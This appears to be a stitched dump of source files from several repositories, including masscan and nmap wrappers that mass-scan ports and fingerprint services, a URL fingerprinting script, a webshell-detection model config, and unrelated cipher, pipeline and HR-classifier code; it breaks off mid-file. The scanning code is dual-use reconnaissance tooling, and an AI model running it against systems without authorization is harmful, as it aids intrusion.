'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.9',
'Connection': 'close'
}
try:
r = requests.get(url, headers=request_headers, verify=False, timeout=100)
with open(file_path + url.split('/')[-1], "wb") as code:
code.write(r.content)
logger.info('download nvd success - {}'.format(url))
except Exception as e:
logger.error('code 0701001 - download nvd failed by {} - {}'.format(url, e))
def main(url, sql_dict):
file_path = os.path.join(settings.BASE_DIR, settings.NVD_JSON_PATH)
get_new_nvd(url, file_path)
try:
get_file_info(file_path, sql_dict)
except Exception as e:
logger.error('code 0704001 - {}'.format(e))
if __name__ == '__main__':
main('https://nvd.nist.gov/feeds/json/cve/1.1/nvdcve-1.1-2021.json.zip')
```
#### File: ase/TaskModel/masscan_task.py
```python
import random
import time
import masscan
import logging
logger = logging.getLogger("mdjango")
class IpMasscan:
def __init__(self, masscan_args='--wait 5 --rate 5000'):
self.masscan_args = masscan_args
self.masscan = masscan.PortScanner()
def port_scan(self, targets, port):
"""端口存活扫描
端口存活扫描
Args:
targets: ip数组.
port: 端口.
Returns:
无
"""
if len(targets) < 1:
return targets
targets1 = []
targets2 = []
for i, value in enumerate(targets):
targets1.append(value)
if (i + 1) % 1000 == 0:
targets2.append(targets1)
targets1 = []
if targets1:
targets2.append(targets1)
results = set()
for targets in targets2:
for i in range(2):
scan_result = {}
random.shuffle(targets)
target_str = ','.join(targets)
try:
scan_result = self.masscan.scan('"{}"'.format(target_str), ports=port,
arguments=self.masscan_args)
break
except Exception as e:
logger.error('{} --- {} --- {}'.format(e,
e.__traceback__.tb_lineno,
e.__traceback__.tb_frame.f_globals["__file__"]))
finally:
pass
scan_ips = scan_result.get('scan', {})
for ip, value in scan_ips.items():
port_state = value.get('tcp', {}).get(int(port), {}).get('state', '')
if 'open' in port_state:
results.add(ip)
time.sleep(0.1)
return list(results)
def ip_scan(self, targets, ports_str):
"""ip存活扫描
ip存活扫描
Args:
targets: ip.
ports_str: 端口数据
Returns:
无
"""
# 40个
ports = '21,22,23,25,53,80,110,111,123,135,139,143,161,443,445,993,995,1080,1433,1434,1723,3128,3389,4750,' \
'5900,8080,8081,9101,9080,18080,28080,37111,37112,37113,37114,37115,37116,37117,37118,37119'
if ports_str:
ports = ports_str
result_ip = set()
result_port = set()
for i in range(2):
try:
scan_result = self.masscan.scan('"{}"'.format(','.join(targets)),
ports=ports,
arguments=self.masscan_args)
scan_ips = scan_result.get('scan', {})
for ip, value in scan_ips.items():
logger.info('subtask masscan result: [{}] --- [{}]'.format(ip, value))
value_dict = value.get('tcp', {})
if len(value_dict.items()) > 50:
continue
result_ip.add(ip)
for port_temp in value_dict.keys():
result_port.add(port_temp)
time.sleep(1)
random.shuffle(targets)
except Exception as e:
logger.error('{} --- {} --- {}'.format(e,
e.__traceback__.tb_lineno,
e.__traceback__.tb_frame.f_globals["__file__"]))
finally:
pass
return list(result_ip), list(result_port)
if __name__ == '__main__':
my_scan = IpMasscan('--wait 15 --rate 10000')
print(my_scan.ip_scan(
'172.16.58.3,172.16.17.32,192.168.3.11,192.168.127.12,172.16.17.32,172.16.31.10,192.168.3.11,192.168.127.12,172.16.58.3,172.16.58.3,172.16.17.32,172.16.58.3,192.168.3.11,192.168.127.12,192.168.127.12,172.16.31.10,192.168.127.12,192.168.3.11,172.16.58.3,172.16.31.10,192.168.3.11,172.16.58.3,172.16.58.3,192.168.3.11,172.16.31.10,192.168.3.11,172.16.17.32,172.16.58.3,192.168.3.11,172.16.17.32,172.16.58.3'.split(
','),
'1-1024,1080,1433,1434,1723,3128,3389,4750,900,8080,8081,9101,9080'))
```
#### File: ase/TaskModel/nmap_task.py
```python
import nmap
def main(target_port, port_type='TCP'):
target = target_port.split(':')[0]
port = int(target_port.split(':')[1])
white_list = ["java-rmi", "Ftp", "Ssh", "Sftp", "Telnet", "Tftp", "Rpc", "Netbios", "Xmanager", "Xwin", "Ldap", "Rlogin", "SQL", "Oracle", "Rdp", "Remoteadmin", "X11", "TCP_Napster_directory_8888_primary", "DB2", "GaussDB", "essbase", "oracle-tns", "mysql", "sybase", "sybasedbsynch", "sybasesrvmon", "postgresql", "redis", "mongodb", "SAP HANA", "hbase", "HBase-managed", "Hive"]
white_list = [item.lower() for item in white_list]
port_type = 'TCP' if port_type.upper() not in ['TCP', 'UDP'] else port_type
result_data = {'ip': target, 'port': port, 'port_type': port_type}
nmap_scan = nmap.PortScanner()
nmap_args = '-sS -sV -sU -Pn --max-retries 3 --min-rtt-timeout 500ms --max-rtt-timeout 3000ms'
nmap_args += ' --initial-rtt-timeout 500ms --defeat-rst-ratelimit --min-rate 10000 --max-rate 15000'
try:
target = target.replace('"', '')
scan_result = nmap_scan.scan(hosts='"{}"'.format(target),
ports='{}:{}'.format('U' if port_type.upper() == 'UDP' else 'T', port),
arguments=nmap_args)
try:
port_info = scan_result['scan'].get(target, {})
except Exception as e:
domain_ip = list(scan_result['scan'].keys())[0]
port_info = scan_result['scan'].get(domain_ip, {})
result_data['hostname'] = str(port_info.get('hostnames', {}))
result_data['vendor'] = str(port_info.get('vendor', {}))
port_type_info = port_info.get(port_type.lower(), {}).get(port, {})
result_data['state'] = port_type_info.get('state', '')
if 'open' not in result_data['state']:
return None
result_data['version'] = port_type_info.get('version', '')
result_data['service_name'] = port_type_info.get('name', '')
result_data['application'] = port_type_info.get('product', '')
result_data['extra_info'] = port_type_info.get('extrainfo', '')
result_data['cpe'] = port_type_info.get('cpe', 'cpe:/n:unknown:unknown')
result_data['vendor'] = result_data['cpe'].split(':')[2]
application_temp = result_data['application'].lower()
if any(item in application_temp for item in white_list):
result_data['remarks'] = 'risk port'
else:
result_data['remarks'] = ''
return result_data
except Exception as e:
print(e)
pass
return None
if __name__ == '__main__':
# print(nmap.__version__)
print(main('www.baidu.com:443', port_type='TCP'))
``` |
{
"source": "5wimming/bert-webshell",
"score": 2
} |
#### File: 5wimming/bert-webshell/config.py
```python
import pathlib
import os
basedir = str(pathlib.Path(os.path.abspath(__file__)).parent.parent.parent)
class Config():
def __init__(self):
self.bert_config_file = './multilingual_L-12_H-768_A-12/bert_config.json'
self.vocab_file = './multilingual_L-12_H-768_A-12/vocab.txt'
self.data_dir = './data/'
# self.data_dir = '/Data/xiaobensuan/cnews/'
self.output_dir = './output/' # fine-tune 的输出模型
self.init_checkpoint = './multilingual_L-12_H-768_A-12/bert_model.ckpt'
self.pb_model_dir ='./pb/'
self.train_checkpoint = './results'
self.do_lower_case = True
self.verbose_logging = False
self.master = None
self.version_2_with_negative = False
self.null_score_diff_threshold = 0.0
self.use_tpu = False
self.tpu_name = None
self.tpu_zone = None
self.gcp_project = None
self.num_tpu_cores = 8
self.task_name = 'domain'
self.gpu_memory_fraction = 0.8
self.max_seq_length = 150
self.doc_stride = 128
self.max_query_length = 64
self.do_train = True
self.do_predict = False
self.do_eval = True
self.batch_size = 20
self.learning_rate = 5e-5
self.num_train_epochs = 3.0
self.warmup_proportion = 0.1
self.save_checkpoints_steps = 100
self.iterations_per_loop = 1000
self.n_best_size = 20
self.max_answer_length = 30
``` |
{
"source": "5wimming/url-fingerprint",
"score": 2
} |
#### File: 5wimming/url-fingerprint/thread_main.py
```python
import os
import time
import queue
import logging
import requests
import threading
import pandas as pd
import datetime
import csv
from Wappalyzer import Wappalyzer
# 引入需调用的脚本
import task
# log配置
log_format = '[%(asctime)s]-[%(levelname)s] - %(message)s'
time_format = '%Y-%m-%d %H:%M:%S'
logging.basicConfig(
level=logging.INFO,
format=log_format,
datefmt=time_format,
filename=time.strftime('task.log'),
filemode='a'
)
# 配置log输出到console
console = logging.StreamHandler()
console.setLevel(logging.INFO)
console.setFormatter(logging.Formatter(log_format, time_format))
logging.getLogger('').addHandler(console)
# 线程锁
thread_mutex = threading.Lock()
# 线程数
thread_max = 5
# 数据文件
input_file = 'input_url.txt'
# 登录账号密码
url_account = '5wimming'
url_password = '<PASSWORD>'
# 自动刷新登录Cookie次数
auto_refresh_cookie = 5000
body_save_path = './output/'
wappalyzer = Wappalyzer.latest().categories
csv_columns = ['url', 'status', 'headers', 'body length', 'body url nums', 'redirect url', 'title'] \
+ list(map(lambda key: wappalyzer[key]['name'], wappalyzer))
def get_url_cookie():
global cookie
cookie = 'RememberMe=5wimming;'
return cookie
def output_mkdir(path):
path = path.strip()
if not os.path.exists(path):
os.makedirs(path)
def thread_process_func(task_queue, result_queue):
global cookie
output_mkdir(body_save_path)
while True:
try:
try:
target = task_queue.get_nowait()
except queue.Empty:
logging.info('{} Task done'.format(threading.current_thread().name))
result_queue.put_nowait('Task done')
break
logging.info('[{}] - {}'.format(task_queue.qsize(), target))
# 调用任务处理函数并取处理结果到result_queue
result = task.main(target, cookie, csv_columns)
result_queue.put_nowait(result)
except Exception as e:
logging.error('{} - {}'.format(threading.current_thread().name, e))
def save_csv(result):
result = list(map(list, zip(*result)))
columns = ['url', 'headers', 'body length', 'body url nums', 'redirect url', 'title']
db = pd.DataFrame([], columns=columns)
for i, value in enumerate(result):
db[columns[i]] = value
db.to_csv('urlInfo_' + datetime.datetime.now().strftime('%Y%m%d%H%M') + '.csv', na_rep='NA', index=0)
def thread_result_func(result_queue, output_file):
thread_done_total = 0
result_total = 0
try:
fw = open(output_file, 'w', encoding='utf-8', newline="")
# with open(output_file, 'w', encoding='UTF-8') as fw:
csv_writer = csv.writer(fw)
csv_writer.writerow(csv_columns)
while True:
try:
result = result_queue.get()
result_total += 1
if not result_total % auto_refresh_cookie:
get_url_cookie()
if result == 'Task done':
thread_done_total += 1
if thread_done_total == thread_max:
break
else:
continue
csv_writer.writerow(result)
except Exception as e:
logging.error('{} - {}'.format(threading.current_thread().name, e))
except Exception as e:
logging.error('{} - {}'.format(threading.current_thread().name, e))
finally:
fw.close()
def main():
logging.info('-' * 50)
if not os.path.exists(input_file):
logging.error('Not found input file: {}'.format(input_file))
logging.info('-' * 50)
exit(0)
logging.info('Read data')
with open(input_file, encoding='UTF-8') as fr:
input_data = fr.readlines()
logging.info('Create queue')
task_queue = queue.Queue()
for data in input_data:
task_queue.put_nowait(data.strip())
result_queue = queue.Queue()
thread_list = list()
# 获取登录Cookie
get_url_cookie()
# 任务处理线程
logging.info('Create thread')
for x in range(thread_max):
thread = threading.Thread(target=thread_process_func, args=(task_queue, result_queue))
thread.start()
thread_list.append(thread)
# 结果输出线程
output_file = time.strftime('result_data_%Y%m%d%H%M%S.csv')
result_thread = threading.Thread(target=thread_result_func, args=(result_queue, output_file), name='Result Thread')
result_thread.start()
for thread in thread_list:
thread.join()
result_thread.join()
logging.info('All Task Done')
logging.info('Output output: {}'.format(output_file))
logging.info('-' * 50)
exit(0)
if __name__ == '__main__':
main()
# start_time = '2020-03-24 20:00'
# logging.info('Start time: {}'.format(start_time))
# while True:
# if time.strftime('%Y-%m-%d %H:%M') == start_time:
# main()
# break
# time.sleep(1)
``` |
{
"source": "5x12/pipely",
"score": 2
} |
#### File: example/src/file3_shared.py
```python
class aSumPrint:
def run(self, context): #include context
a_sum = context["aSum"] #to extract from shared dictionary
print(f'a_sum = {a_sum}')
def __call__(self, context):
self.run(context) #to run the function
``` |
{
"source": "5x12/ppline",
"score": 3
} |
#### File: ppline/easy/command.py
```python
from typing import Optional
import os
from ppline.yamlread.yamlread import yamlRead
from ppline.triggerclass.triggerclass import triggerClass
class Run:
def __init__(self, config_file: Optional[str] = None,
project_dir: Optional[str] = None,
trigger_class: Optional[str] = None,
gitlab: Optional[str] = None):
self.config_file = config_file
self.project_dir = project_dir
self.trigger_class = trigger_class
self.gitlab = gitlab
if (self.config_file is None) & (self.trigger_class is None):
raise Exception(f'Nothing to do. Please specify either --config_file or --trigger_class. Use ppline --help for more info.')
if (self.config_file is not None) & (self.project_dir is None):
path = self.config_file
execute=yamlRead(dag_path=path, gitlab=self.gitlab)
execute()
if self.project_dir is not None:
path = self.project_dir+'/'+self.config_file
if os.path.exists(path)==False:
raise Exception(f'Cannot find a config .yml/.yaml file at path {path}.')
execute=yamlRead(dag_path=path, gitlab=self.gitlab)
execute()
if self.trigger_class is not None:
path_to_file, class_to_trigger = self.trigger_class.split(":")
if os.path.exists(path_to_file)==False:
raise Exception(f'Cannot find a .py file at path {path_to_file}.')
execute = triggerClass(path_to_file, class_to_trigger)
execute()
```
#### File: validation/schemes/v1_0.py
```python
from schema import Optional, Or, Regex, Schema, Use
from ppline.utils.const import dagmap_consts
def regex_safe(text: str):
for symbol in ('.', '[', ']', '|', '^'):
text = text.replace(symbol, f'\{symbol}')
return rf'{text}'
def complete(regex):
return rf'^{regex}\Z'
exec_path_separator = regex_safe(dagmap_consts.EXEC_PATH_SEPARATOR)
STAGE_NAMING_REGEX = r'[a-zA-Z_][-\w]*'
EXEC_REGEX = rf'\S*{exec_path_separator}[a-zA-Z_]\w*'
STEP_NAME = Regex(complete(STAGE_NAMING_REGEX), error='Invalid step name.')
EXEC = Regex(complete(EXEC_REGEX), error='Exec path should be patterned as "{module_path.py}:{exec_name}".')
STATIC_DAG_SCHEMA = Schema({
dagmap_consts.STEPS_KEYNAME: {
STEP_NAME: {
dagmap_consts.EXEC_KEYNAME: EXEC,
# Optional('params'): CONTEXT_SCHEMA,
# Optional(dagmap_consts.INDEXED_INPUTS_KEYNAME): Or([OUTPUT], [INDEXED_OUTPUT], []),
# Optional(dagmap_consts.NAMED_INPUTS_KEYNAME): Or({
# dagmap_consts.ALL_INPUTS_KEYNAME: [OUTPUT]
# }, {
# OUTPUT_NAME: INDEXED_OUTPUT
# }, {})
Optional(dagmap_consts.DEPENDS_ON_KEYNAME): Or([STEP_NAME], []),
}
# },
# Optional(dagmap_consts.DEPENDS_ON_KEYNAME): Or([STEP_NAME], []),
# Optional(dagmap_consts.TAGS_KEYNAME): Or([TAG_NAME], [])
}
})
def parse_schema(dag: dict, schema: Schema) -> dict:
return schema.validate(dag)
``` |
{
"source": "5x5x5x5/Back2Basics",
"score": 4
} |
#### File: Back2Basics/python/collatz.py
```python
def collatz(number):
if number % 2 == 0:
number = number // 2
print(number)
return number
elif number == 1:
return number
else:
number = number * 3 + 1
print(number)
return number
print('Come on gimme a number!! Hurry! The milliseconds are burning!')
number = int(input())
# collatz(collatz(collatz(collatz(collatz(collatz(number))))))
print(number)
while number != 1:
number = collatz(number)
"""
if starter == 1:
print(str(starter) + ' is where we always end up')
elif starter % 2 == 0:
evenNumber = starter // 2
print(str(evenNumber))
if evenNumber == 1:
print(str(evenNumber) + ' is where we always end up')
elif evenNumber % 2 == 0:
evenNumber2 = evenNumber // 2
print(str(evenNumber2))
else:
oddNumber2 = evenNumber * 3 + 1
print(str(oddNumber2))
else:
oddNumber = starter * 3 + 1
print(str(oddNumber))
if oddNumber == 1:
print(str(oddNumber) + ' is where we always end up')
elif oddNumber % 2 == 0:
evenNumber2 = oddNumber // 2
print(str(evenNumber2))
else:
oddNumber2 = oddNumber * 3 + 1
print(str(oddNumber2))
"""
"""
def collatz(number):
if number == 1:
print(str(number) + ' is where we always end up')
return
elif number % 2 == 0:
collatz(number // 2)
else:
collatz(number * 3 + 1)
"""
"""
while number != 1:
if number % 2 == 0:
number = number // 2
print(str(number))
return finalNum
if number % 2 == 1:
number = (number *3) + 1
print(str(number))
return finalNum
if number % 2 == 0:
number = number // 2
print(str(number))
return finalNum
else:
number = (number * 3) + 1
print(str(number))
return finalNum
"""
"""
print('Go ahead and type a number already. You won\'t believe what happens next')
number = int(input())
collatz(number)
"""
"""
while True:
collatz(finalNum)
finalNum = collatz(finalNum)
if finalNum == 1:
break
"""
```
#### File: Back2Basics/python/scopePractice.py
```python
"""
# Global variables can be read from local scope.
def spam():
print(eggs)
eggs = 42
spam()
print(eggs)
"""
"""
# Local and global variables with the same name.
def spam():
eggs = 'spam local'
print(eggs) # prints 'spam local'
def bacon():
eggs = 'bacon local'
print(eggs) # prints 'bacon local'
spam()
print(eggs) # prints 'bacon local'
eggs = 'global'
bacon()
print(eggs) # prints 'global'
"""
"""
# the global statement
def spam():
global eggs
eggs = 'spam'
eggs = 'it don\'t matter'
spam()
print(eggs)
"""
"""
def spam():
global eggs
eggs = 'spam' # this is the global
def bacon():
eggs = 'bacon' # this is a local
def ham():
print(eggs) # this is the global
eggs = 42 # this is global
spam()
print(eggs)
"""
# Python will not fall back to using the global eggs variable
def spam():
eggs = 'wha??'
print(eggs) # ERROR!
eggs = 'spam local'
eggs = 'global'
spam()
# This error happens because Python sees that there is an assignment statement for eggs in the spam() function and therefore considers eggs to be local. Because print(eggs) is executed before eggs is assigned anything, the local variable eggs doesn't exist.
``` |
{
"source": "5x/cryptography-gui-app",
"score": 3
} |
#### File: cryptography-gui-app/crypt/caesar_cipher.py
```python
from crypt.alphabet import get_alphabet
from crypt.cipher_abc import CipherABC
class CaesarCipher(CipherABC):
def __init__(self, key, alphabet='EN'):
super().__init__(key)
self.symbols_collection = get_alphabet(alphabet)
@CipherABC.key.setter
def key(self, value):
self._key = int(value)
def encrypt(self, plain_text):
return self._shift_msg(self._key, plain_text)
def decrypt(self, cipher_text):
return self._shift_msg(-self._key, cipher_text)
def _shift_msg(self, key, message):
shift_map = self._shift_map(key)
shifted_msg = (shift_map.get(char, char) for char in message)
return "".join(shifted_msg)
def _shift_map(self, shift):
assoc_map = {}
for symbols in self.symbols_collection:
symbols_len = len(symbols)
if symbols_len == 0:
continue
for j in range(symbols_len):
in_char = symbols[j]
shifted = (j + shift) % symbols_len
assoc_map[in_char] = symbols[shifted]
return assoc_map
if __name__ == "__main__":
cipher = CaesarCipher("4")
crt_text = cipher.encrypt("the quick brown fox jumps over the lazy dog.")
plain_text = cipher.decrypt(crt_text)
print(crt_text)
print(plain_text)
```
#### File: cryptography-gui-app/crypt/cipher_abc.py
```python
from abc import ABCMeta, abstractmethod
class CipherABC(metaclass=ABCMeta):
def __init__(self, key, *args, **kwargs):
self.key = key
@property
def key(self):
return self._key
@key.setter
def key(self, value):
self._key = value
@abstractmethod
def encrypt(self, plain_text):
pass
@abstractmethod
def decrypt(self, cipher_text):
pass
```
#### File: cryptography-gui-app/crypt/des_cipher.py
```python
import hashlib
from base64 import b64encode, b64decode
from Crypto import Random
from Crypto.Cipher import DES
from crypt.cipher_abc import CipherABC
from crypt.utils.bitstr import str_to_bits, positive_align_str, bits_to_str
class DESCipher(CipherABC):
def __init__(self, key):
super().__init__(key)
@CipherABC.key.setter
def key(self, value):
string_utf = value.encode()
hash_value = hashlib.md5(string_utf)
value = hash_value.hexdigest()
value = value[:8].encode()
self._key = value
def encrypt(self, plain_text):
text = str_to_bits(plain_text)
text = positive_align_str(text, 16, "\0")
data = text.encode()
iv = Random.new().read(DES.block_size)
cipher = DES.new(self.key, DES.MODE_CFB, iv)
data = iv + cipher.encrypt(data)
cipher_text = b64encode(data).decode()
return cipher_text
def decrypt(self, cipher_text):
enc = b64decode(cipher_text.encode())
iv = enc[:DES.block_size]
cipher = DES.new(self.key, DES.MODE_CFB, iv)
enc_data = enc[DES.block_size:]
plain_bytes = cipher.decrypt(enc_data)
plain_decoded_bytes = plain_bytes.decode()
plain_text = bits_to_str(plain_decoded_bytes)
plain_text.rstrip("\0")
return plain_text
if __name__ == "__main__":
c = DESCipher("f1")
f = c.encrypt("""
The quick brown fox jumps over the lazy dog.
The five boxing wizards jump quickly.
В Бахчисараї фельд'єґер зумів одягнути ящірці жовтий капюшон!
Жебракують філософи при ґанку церкви в Гадячі, ще й шатро їхнє п'яне знаємо
В чащах юга жил бы цитрус? Да, но фальшивый экземпляр!
Съешь [же] ещё этих мягких французских булок да выпей чаю.
Экс-граф? Плюш изъят. Бьём чуждый цен хвощ!""")
t = c.decrypt(f)
print(f)
print(t)
```
#### File: cryptography-gui-app/crypt/gamma_cipher.py
```python
from random import Random
from crypt.trithemius_cipher import TrithemiusCipher, TrithemiusHandleABC
from crypt.cipher_abc import CipherABC
class SimplePRNG(TrithemiusHandleABC):
SHIFT_C1 = 53
def __init__(self, symbols_collection, key, *args, **kwargs):
super().__init__(*args, **kwargs)
self._symbols_len = len(symbols_collection)
self._random_inst = Random(x=key)
def __iter__(self):
while True:
rand_int = self._random_inst.randint(0, self._symbols_len)
next_val = (rand_int + SimplePRNG.SHIFT_C1) % self._symbols_len
yield next_val
def get_code(self, index):
return next(self.__iter__())
class GammaCipher(TrithemiusCipher):
def __init__(self, key, alphabet='EN'):
super().__init__(key, SimplePRNG, alphabet)
@CipherABC.key.setter
def key(self, value):
self._key = int(value)
if __name__ == "__main__":
cipher = GammaCipher("54")
crt_text = cipher.encrypt("the quick brown fox jumps over the lazy dog.")
plain_text = cipher.decrypt(crt_text)
print(crt_text)
print(plain_text)
```
#### File: crypt/utils/expr_parser.py
```python
import ast
from string import ascii_lowercase
operators = {
ast.Add: "+",
ast.Sub: "-",
ast.Mult: "*",
ast.Div: "/",
ast.Pow: "**",
ast.USub: "-", # unary -1
ast.UAdd: "+" # unary +1
}
def prepare_expression(text_expression):
parsed_expression = parse_expression(text_expression)
return eval("lambda **kwargs: " + parsed_expression)
def parse_expression(text_expression):
node = ast.parse(text_expression, mode='eval')
body = node.body
return ast_walk(body)
def ast_walk(node):
if isinstance(node, ast.Num) and isinstance(node.n, int):
return str(node.n)
elif isinstance(node, ast.BinOp):
left = ast_walk(node.left)
right = ast_walk(node.right)
op_char = operators[type(node.op)]
return "({}{}{})".format(left, op_char, right)
elif isinstance(node, ast.UnaryOp):
return operators[type(node.op)] + ast_walk(node.operand)
elif isinstance(node, ast.Name) and len(node.id) == 1 and \
node.id in ascii_lowercase:
return "kwargs['{}']".format(node.id)
else:
raise TypeError(node)
def view_evaluated_expresion(text_expression, **kwargs):
expression = prepare_expression(text_expression)
expression_value = expression(**kwargs)
parameters = ["{0}={1}".format(key, value)
for key, value in kwargs.items()]
parameters_repr = ", ".join(parameters)
echo_format = "{0}, {{{1}}} = {2}"
return echo_format.format(text_expression, parameters_repr,
expression_value)
if __name__ == "__main__":
num_of_samples = 10
for i in range(num_of_samples):
print(view_evaluated_expresion("(4*i**3)-4*(t+-9)*t", t=i, i=i * i))
```
#### File: crypt/utils/number_theory_algs.py
```python
def extended_gcd(a, b):
a, b = abs(a), abs(b)
A, B, C, D = 1, 0, 0, 1
while b != 0:
q, r = divmod(a, b)
x = A - (q * C)
y = B - (q * D)
a, b, A, C, B, D = b, r, C, x, D, y
return a, A, B
if __name__ == "__main__":
print(extended_gcd(1234, 54)) # 2, -7, 160
print(extended_gcd(654137 ** 112, 550)) # 11, -19, 78214...725
print(extended_gcd(15, 3)) # 3, 0, 1
``` |
{
"source": "5x/ds-ants-geopy-extended",
"score": 3
} |
#### File: ds-ants-geopy-extended/ants/utils.py
```python
import os
import shelve
from functools import wraps
from itertools import chain
def load_lines(file_path):
"""
Return list with loaded lines from file, separated with newline.
Leading and trailing whitespace removed from each line.
:param file_path: Absolute or relative file path.
:return: List of lines.
"""
lines = []
with open(file_path, 'r') as file:
for line in file:
lines.append(line.strip())
return lines
def __build_memoize_path(path, store_name):
if not path:
path = os.getcwd()
dir_name = '.memoize_store'
store_dir = os.path.join(path, dir_name, store_name)
if not os.path.exists(store_dir):
os.makedirs(store_dir)
return os.path.join(store_dir, store_name)
def persist_memoize(store_name, path=None):
store_path = __build_memoize_path(path, store_name)
def real_decorator(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
arguments = [str(i) for i in chain(args, kwargs.items())]
arguments = ','.join(arguments)
key = '{}:{}({})'.format(fn.__module__, fn.__name__, arguments)
with shelve.open(store_path) as store:
if key not in store:
store[key] = fn(*args, **kwargs)
store.sync()
result = store[key]
return result
return wrapper
return real_decorator
``` |
{
"source": "5x/ds-hr-helper",
"score": 3
} |
#### File: 5x/ds-hr-helper/hr_helper.py
```python
import re
from collections import Counter
from itertools import chain
from random import shuffle
from string import ascii_letters
import numpy as np
from nltk.corpus import stopwords
from nltk.stem.snowball import SnowballStemmer
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import BernoulliNB
STEMMER_EN = SnowballStemmer('english')
STEMMER_RU = SnowballStemmer('russian')
STEMMER_PORTER = SnowballStemmer('porter')
PATTERN_NO_LETTERS = re.compile('[\W\d_]+', re.UNICODE)
CYRILLIC_BASE_SYMBOLS = 'уеъыаоэяиьюії'
JOB_ACCEPT_STR = 'Accept'
JOB_DECLINE_STR = 'Decline'
def load_file(filename, encoding='utf-8'):
with open(filename, 'r', encoding=encoding) as file:
return file.read().splitlines()
DEFAULT_STOP_WORDS = set(
stopwords.words('english') +
stopwords.words('russian') +
load_file('uk_stop_words.txt')
)
def get_most_common_values(values, n):
value_counter = Counter(values)
most_common_values = value_counter.most_common(n)
return [value for value, _ in most_common_values]
def identify_stemer(word):
for char in word:
if char in CYRILLIC_BASE_SYMBOLS:
return STEMMER_RU
elif char in ascii_letters:
return STEMMER_EN
return STEMMER_PORTER
def sanitize_word(word, stop_words, is_stem=True):
word = word.lower()
word = PATTERN_NO_LETTERS.sub('', word)
if is_stem and word not in stop_words:
stemmer = identify_stemer(word)
word = stemmer.stem(word)
return word
def get_sentence_sanitized_words(text, stop_words, is_stem=True):
clean_words = []
terms = text.split()
for term in terms:
word = sanitize_word(term, stop_words, is_stem)
if word and word not in stop_words:
clean_words.append(word)
return clean_words
def get_all_words(values, stop_words, is_stem=True):
words_generator = (get_sentence_sanitized_words(value, stop_words, is_stem)
for value in values)
return list(chain.from_iterable(words_generator))
def normalize_weights(weights):
min_value = min(weights)
max_value = max(weights) - min_value
if max_value == 0:
max_value = 1
return [(w - min_value) / max_value for w in weights]
def calculate_min_accept_weight(weights, percent_of_accept):
num_of_variants = len(weights)
max_accept_index = (1 - percent_of_accept / 100) * num_of_variants
max_accept_index = round(max_accept_index)
sorted_weights = sorted(weights)
possible_weights = sorted_weights[max_accept_index:]
return next((weight for weight in possible_weights if weight > 0), 1)
def decisions_job_offers(weights, percent_of_accept):
yes_str, no_str = JOB_ACCEPT_STR, JOB_DECLINE_STR
accept_limit = calculate_min_accept_weight(weights, percent_of_accept)
return [yes_str if weight >= accept_limit else no_str
for weight in weights]
def calculate_simple_weight(words, word, word_weight, _):
return words.count(word) / word_weight
def calculate_common_weight(words, word, word_weight, _):
return words.count(word) ** (1 / word_weight)
def calculate_common_extended_weight(words, word, word_weight, common_words):
return words.count(word) ** (1 - word_weight / len(common_words))
def build_weights(data, common_words, stop_words, is_stem=True):
weights = []
for text in data:
words = get_sentence_sanitized_words(text, stop_words, is_stem)
entry_weight = 0
for word_weight, word in enumerate(common_words, 1):
entry_weight += calculate_common_weight(words, word, word_weight,
common_words)
weights.append(entry_weight)
return normalize_weights(weights)
def classification(classificator, vectorizer, x_train, y_train, x_test):
x_train = vectorizer.fit_transform(x_train)
y_train = np.array(y_train, dtype=np.str)
x_test = vectorizer.transform(x_test)
classificator.fit(x_train, y_train)
return classificator.predict(x_test)
def build_tokenizer(stop_words, is_stem):
def tokenizer(text):
return get_sentence_sanitized_words(text, stop_words, is_stem)
return tokenizer
def build_training_data(data, num_of_common_words, percent_of_accept,
stop_words, is_stem=False):
words = get_all_words(data, stop_words, is_stem)
common_words = get_most_common_values(words, num_of_common_words)
weights = build_weights(data, common_words, stop_words, is_stem)
return decisions_job_offers(weights, percent_of_accept)
def show_head_entries(x_test, y_test, n, show_declined=False):
needed_status = JOB_DECLINE_STR if show_declined else JOB_ACCEPT_STR
for index, status in enumerate(y_test):
if status == needed_status:
value = x_test[index]
template = '[{}] #{:04}: {}...'
print(template.format(status, index, value[:60]))
n -= 1
if n <= 0:
break
def classificate_jobs(data, exclude_words, num_of_train_rows,
num_of_common_words, percent_of_accept, is_stem):
stop_words = set(exclude_words)
stop_words.update(DEFAULT_STOP_WORDS)
tokenizer = build_tokenizer(stop_words, is_stem)
vectorizer = TfidfVectorizer(tokenizer=tokenizer, lowercase=False,
stop_words=None, dtype=np.float64)
x_train = data[:num_of_train_rows]
x_test = data[num_of_train_rows:]
y_train = build_training_data(x_train, num_of_common_words,
percent_of_accept, stop_words, is_stem)
clf = BernoulliNB(alpha=1)
y_test = classification(clf, vectorizer, x_train, y_train, x_test)
print('Word SnowballStemmer enable: {}.'.format(is_stem))
common_words_template = 'Number of common words used for training: {}.'
print(common_words_template.format(num_of_common_words))
print('Loaded data size: {}.'.format(len(data)))
print('Training data size: {}.'.format(len(x_train)))
print('Test data size: {}.'.format(len(x_test)))
train_counter = Counter(y_train)
train_accepted = train_counter.get(JOB_ACCEPT_STR, 0)
train_declined = train_counter.get(JOB_DECLINE_STR, 0)
train_data_percent_of_accept = train_accepted / (len(x_train) / 100)
percent_of_accept_template = 'Defined training percent of accept: {:.2f}%.'
print(percent_of_accept_template.format(percent_of_accept))
train_data_template = 'Real training percent of accept: {:.2f}%.'
print(train_data_template.format(train_data_percent_of_accept))
accepted_template = 'Training data distribution(Accept/Decline): {}/{}.'
print(accepted_template.format(train_accepted, train_declined))
y_test_counter = Counter(y_test)
test_accept = y_test_counter.get(JOB_ACCEPT_STR, 0)
test_decline = y_test_counter.get(JOB_DECLINE_STR, 0)
test_data_percent_of_accept = test_accept / (len(x_test) / 100)
percent_of_accept_template = 'Test data percent of accept: {:.2f}%.'
print(percent_of_accept_template.format(test_data_percent_of_accept))
test_accept_template = 'Test data distribution(Accept/Decline): {}/{}.'
print(test_accept_template.format(test_accept, test_decline))
num_of_previews = 10
print('\nFirst Accepted in training data:')
show_head_entries(x_train, y_train, num_of_previews)
print('\nFirst Declined in training data:')
show_head_entries(x_train, y_train, num_of_previews, show_declined=True)
print('\nFirst Accepted in test data:')
show_head_entries(x_test, y_test, num_of_previews)
print('\nFirst Declined in test data:')
show_head_entries(x_test, y_test, num_of_previews, show_declined=True)
if __name__ == '__main__':
